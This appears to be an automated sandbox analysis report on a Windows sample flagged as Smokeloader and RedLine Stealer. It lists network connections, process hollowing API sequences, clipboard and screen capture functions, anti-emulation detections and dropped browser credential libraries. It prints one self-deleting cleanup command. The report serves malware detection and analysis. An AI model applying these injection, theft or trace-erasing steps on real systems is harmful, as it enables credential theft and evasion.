Source: GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: 21AE.exe, 00000005.00000003.2385657700.0000000002D94000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986105264.000000001E449000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 21AE.exe, 00000005.00000003.2385657700.0000000002D94000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986105264.000000001E449000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 21AE.exe, 00000005.00000003.2385657700.0000000002D94000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986105264.000000001E449000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49748 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_0042EAB0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 5_2_0042EC90
Source: Yara match File source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR

System Summary

Source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: aarhevh.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401615
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401658
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00403406 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower, 0_2_00403406
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401620
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401524
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040162D
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401635
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042D9B10 NtProtectVirtualMemory,NtProtectVirtualMemory, 12_2_042D9B10
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042DA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 12_2_042DA4F0
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042D9850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification, 12_2_042D9850
Source: Joe Sandbox View Dropped File: C:\ProgramData\GIEHIDHJDBFI\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\GIEHIDHJDBFI\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: String function: 004087A0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: String function: 0214F807 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: String function: 0040F5A0 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: String function: 02148A07 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6CAC9F30 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6C9B3620 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6C9B9B10 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6CB1D930 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6CB1DAE0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6CB109D0 appears 268 times
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 1724
Source: aarhevh.2.dr Static PE information: No import functions for PE file found
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: No import functions for PE file found
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: aarhevh.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: aarhevh.2.dr Static PE information: Section .text
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: Section .text
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/35@4/9
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 13_2_6C9F0300
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_007BE78E CreateToolhelp32Snapshot,Module32First, 5_2_007BE78E
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0042B20E CoCreateInstance, 5_2_0042B20E
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\aarhevh
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5640
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\21AE.tmp
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: katA304.tmp, katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: 21AE.exe, 00000005.00000003.2359456032.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2371853553.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2358592973.0000000002C95000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2371430067.0000000002C96000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814035133.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2830660684.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, HIDAFH.13.dr, BFHJJJ.13.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe ReversingLabs: Detection: 55%
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Virustotal: Detection: 59%
Source: unknown Process created: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe "C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\aarhevh C:\Users\user\AppData\Roaming\aarhevh
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\21AE.exe C:\Users\user\AppData\Local\Temp\21AE.exe
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 1724
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C9A7.exe C:\Users\user\AppData\Local\Temp\C9A7.exe
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Process created: C:\Users\user\AppData\Local\Temp\katA304.tmp C:\Users\user\AppData\Local\Temp\katA304.tmp
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: webio.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\aarhevh Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: winhttp.dll
